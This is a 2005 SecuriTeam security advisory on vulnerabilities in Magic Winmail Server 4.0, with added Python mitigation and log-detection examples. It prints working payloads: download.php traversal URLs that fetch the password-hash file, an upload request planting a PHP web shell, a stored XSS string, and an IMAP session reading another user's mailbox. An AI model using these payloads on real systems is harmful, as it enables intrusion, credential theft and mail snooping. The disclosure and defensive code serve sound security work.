[NT] Magic Winmail Server's Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/05

    To: list@securiteam.com
    Date: 17 Mar 2005 19:24:47 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Magic Winmail Server's Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.magicwinmail.net/> Magic Winmail Server is an enterprise
    class mail server software system offering a robust feature set, including
    extensive security measures. Winmail Server supports SMTP, POP3, IMAP,
    Webmail, LDAP, multiple domains, SMTP authentication, SPAM protection,
    anti-virus protection, SSL/TLS security, Network Storage, remote access,
    Web-based administration, and a wide array of standard email options such
    as filtering, signatures, real-time monitoring, archiving, and public
    email folders."

    Multiple vulnerabilities were found in Magic Winmail Server's Webmail
    service, IMAP service and FTP service.

    DETAILS

    Vulnerable Systems:
     * Magic Winmail Server version 4.0 build 1112

    Winmail Server's PHP-based Webmail has vulnerabilities that may be
    exploited to download arbitrary files from the server, to upload files to
    arbitrary directories, and to conduct Cross-Site Scripting attacks. A
    directory traversal vulnerability in Winmail Server's IMAP service gives
    a malicious user the ability to read arbitrary users' emails, to
    create or delete arbitrary directories on the server, and/or to retrieve
    arbitrary files from the server. In addition, Winmail Server's FTP service
    does not validate the IP address supplied in a PORT command. This may be
    exploited to perform a port scan from the FTP server (an FTP bounce).
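    The following is an added example, not code from the advisory or from the vendor: a server-side PORT check in Python that closes the FTP gap described above. It accepts an active-mode data connection only back to the address of the control connection's peer, on an unprivileged port, which is the bounce-attack mitigation recommended in RFC 2577; the reply strings are assumed conventional FTP replies.

```python
import re

# PORT h1,h2,h3,h4,p1,p2: four IPv4 octets, then the port as high and low byte.
PORT_RE = re.compile(r"^PORT (\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$")

def parse_port(command):
    """Parse a PORT command into (ip, port); None if malformed."""
    match = PORT_RE.match(command)
    if not match:
        return None
    fields = [int(x) for x in match.groups()]
    if any(f > 255 for f in fields):
        return None
    ip = ".".join(str(f) for f in fields[:4])
    return ip, fields[4] * 256 + fields[5]

def port_allowed(command, control_peer_ip):
    """Decide whether the server should open the requested data connection.
    Refuse anything that would reach a third host (the bounce/port-scan case
    from the advisory) or a privileged port, following RFC 2577's guidance."""
    parsed = parse_port(command)
    if parsed is None:
        return False
    ip, port = parsed
    if ip != control_peer_ip:
        return False  # client asked the server to connect somewhere else
    if port < 1024:
        return False  # never aim the server at a privileged service
    return True

def handle_port(command, control_peer_ip):
    """Reply the server would send (assumed conventional reply texts)."""
    if parse_port(command) is None:
        return "501 Syntax error in parameters or arguments."
    if not port_allowed(command, control_peer_ip):
        return "500 Illegal PORT command."
    return "200 PORT command successful."
```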

    Vulnerabilities in Webmail:
    The download.php script allows a user to download his/her email file
    attachments. Lack of input parameter sanitization allows a logged-on mail
    user to retrieve arbitrary files from the server by supplying specially
    crafted input parameters to download.php. Either of the following two
    requests will retrieve userauth.cfg, which contains users' MD5 password
    hashes.

    http://[hostname]:6080/download.php?
    sid=656041e927559a2ff& // this must be the current session id
    tid=0&folder=INBOX&ix=0&part=1&optype=download&type=nonmime
    &filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw==
    // Note Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== is the base64 encoding of
    /../../../../userauth.cfg

    http://[hostname]:6080/download.php?
    sid=656041e927559a2ff&
    tid=0&folder=INBOX&ix=0&part=1&optype=download&cache=1
    &filename=/../../../../userauth.cfg
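    As an added example (not from the advisory), the Python below detects both request shapes shown above in web-server access logs. The point it illustrates is that the type=nonmime variant carries the path base64-encoded, so a log search for "../" alone misses it; the request lines in SAMPLE_REQUESTS are constructed for the example.

```python
import base64
import binascii
import posixpath
from urllib.parse import parse_qs, urlsplit

# Constructed request lines (not from the advisory) in the two download.php
# shapes described above: base64 filename with type=nonmime, raw with cache=1.
SAMPLE_REQUESTS = [
    "GET /download.php?sid=AAAA&tid=0&folder=INBOX&ix=0&part=1&optype=download"
    "&type=nonmime&filename=cmVwb3J0LnBkZg== HTTP/1.1",
    "GET /download.php?sid=AAAA&tid=0&folder=INBOX&ix=0&part=1&optype=download"
    "&type=nonmime&filename=Ly4uLy4uLy4uLy4uL3VzZXJhdXRoLmNmZw== HTTP/1.1",
    "GET /download.php?sid=AAAA&tid=0&folder=INBOX&ix=0&part=1&optype=download"
    "&cache=1&filename=/../../../../userauth.cfg HTTP/1.1",
    "GET /download.php?sid=AAAA&optype=download&cache=1&filename=invoice.doc HTTP/1.1",
]

def decode_filename(params):
    """Filename as the server would see it: base64-decoded when type=nonmime,
    raw otherwise; None when the parameter is missing."""
    raw = params.get("filename", [None])[0]
    if raw is None or params.get("type", [""])[0] != "nonmime":
        return raw
    try:  # parse_qs turned a literal '+' into ' '; restore it before decoding
        return base64.b64decode(raw.replace(" ", "+"), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return raw  # not valid base64: inspect the literal value instead

def escapes_attachment_dir(filename):
    """True if the name climbs out of a (virtual) attachment directory with
    either separator; grepping for '..' alone would miss the encoded form."""
    virtual_root = "/attach/"
    target = posixpath.normpath(posixpath.join(virtual_root, filename.replace("\\", "/")))
    return not target.startswith(virtual_root)

def scan(request_lines):
    """Decoded filenames of every download.php request that attempted traversal."""
    hits = []
    for line in request_lines:
        fields = line.split(" ")
        if len(fields) < 2:
            continue
        url = urlsplit(fields[1])
        if not url.path.endswith("/download.php"):
            continue
        name = decode_filename(parse_qs(url.query))
        if name is not None and escapes_attachment_dir(name):
            hits.append(name)
    return hits
```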

    The upload.php script allows a mail user to upload his/her email file
    attachment when composing an email. Lack of sanitization of the supplied
    filename allows a logged-on mail user to upload files to arbitrary
    locations on the server. This may be exploited to upload arbitrary PHP
    scripts into the webmail directory. Successful exploitation on a default
    installation of Winmail Server allows execution of arbitrary PHP scripts
    with LOCAL SYSTEM privilege.

    -----------------------------31140333525651
    Content-Disposition: form-data; name="userfile1";
    filename="/../../../a.php"
    Content-Type: application/download

    <?php
    system($_GET[cmd]);
    ?>

    The /admin/user.php script allows the Webmail administrator to view
    webmail users' username, full name, description, and company name. A
    malicious user may enter JavaScript in his own personal info using
    userinfo.php. Due to lack of filtering of HTML special characters, this
    JavaScript will execute in the Webmail administrator's browser when the
    administrator accesses the /admin/user.php script. Such a script may be
    crafted to steal the administrator's session cookie, etc. For example,
    the user may set his description to
    <script>alert(document.form1.sid.value);</script>

    Directory Traversal Vulnerability in IMAP Service:
    A directory traversal vulnerability was found in several of Winmail
    Server's IMAP commands. These commands may be exploited by a malicious
    logged-on user to read arbitrary users' emails, to create or delete
    arbitrary directories on the server, and/or to retrieve arbitrary files
    from the server. IMAP commands such as CREATE, EXAMINE, SELECT and DELETE
    are affected by this vulnerability.

    The following transcript of an IMAP session illustrates this:

    [c:\]nc X.X.X.X 143
    * OK IMAP4 ready! localhost Winmail Mail Server MagicWinmail Extend IMAP 101
    1 LOGIN "test" "password" // login as user test
    1 OK LOGIN OK.
    2 SELECT "../test2/INBOX" // selected user test2's mailbox
    * FLAGS (\Answered \Deleted \Draft \Seen \Recent)
    * OK [PERMANENTFLAGS (\Answered \Draft \Flagged \Seen)]
    * 1 EXISTS
    * 0 RECENT
    * OK [UNSEEN 1] Message 1 is unseen.
    * OK [UIDNEXT 2] Predicted valid
    * OK [UIDVALIDITY 1105791403] UIDs valid
    2 OK [READ-WRITE] OK SELECT completed.
    3 UID fetch 1:1 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // retrieve test2's mail
    * 1 FETCH (UID 1 FLAGS () RFC822.SIZE 271 BODY[] {422}
    Return-Path:
    Delivered-To: test2@xxx.xx
    Received: (winmail server invoked for smtp delivery); Sat, 15 Jan 2005 20:16:18 +0800
    Received: (winmail server invoked for report); Sat, 15 Jan 2005 20:16:18 +0800
    From: postmaster@xxx.xx
    To: test2@xxx.xx
    Date: Sat, 15 Jan 2005 20:16:18 +0800
    Subject: welcome
    Hi, test2
    Welcome to use the mail system!
    Your mail address is test2@xxx.xx.
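    An added mitigation example, not code from the advisory or from Winmail Server: a mailbox-name resolver in Python of the kind an IMAP server should apply to the SELECT, EXAMINE, CREATE and DELETE arguments before touching the file system, so that a name like "../test2/INBOX" from the transcript above is refused. The STORE_ROOT layout (<root>/<user>/<mailbox>) is an assumption made for the example, not the product's real on-disk structure.

```python
import posixpath
import re
from pathlib import PurePosixPath

# Assumed store layout for the example: <STORE_ROOT>/<user>/<mailbox...>.
# This is a constructed layout, not Winmail Server's real on-disk structure.
STORE_ROOT = "/var/mailstore"
# One path segment: letters, digits, '_', '-', with optional dotted parts;
# this cannot match '.', '..', an empty segment or a drive letter like 'C:'.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*$")

class MailboxNameError(ValueError):
    """Raised for a mailbox name that could leave the user's own subtree."""

def resolve_mailbox(user, mailbox, store_root=STORE_ROOT):
    """Map an IMAP mailbox name (SELECT/EXAMINE/CREATE/DELETE argument) to a
    directory under the user's root, or raise MailboxNameError."""
    if not SAFE_SEGMENT.match(user):
        raise MailboxNameError("bad user name")
    name = mailbox.replace("\\", "/")  # normalise Windows separators too
    if name == "" or name.startswith("/"):
        raise MailboxNameError("mailbox name must be relative")
    parts = PurePosixPath(name).parts
    for seg in parts:
        if not SAFE_SEGMENT.match(seg):
            raise MailboxNameError(f"rejected segment {seg!r}")
    user_root = f"{store_root}/{user}"
    target = posixpath.normpath(posixpath.join(user_root, *parts))
    # belt and braces: re-check containment after normalisation
    if not target.startswith(user_root + "/"):
        raise MailboxNameError("mailbox escapes user root")
    return target

def is_safe_mailbox(user, mailbox):
    """Boolean wrapper for use as a command pre-filter."""
    try:
        resolve_mailbox(user, mailbox)
        return True
    except MailboxNameError:
        return False
```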

    ========================================

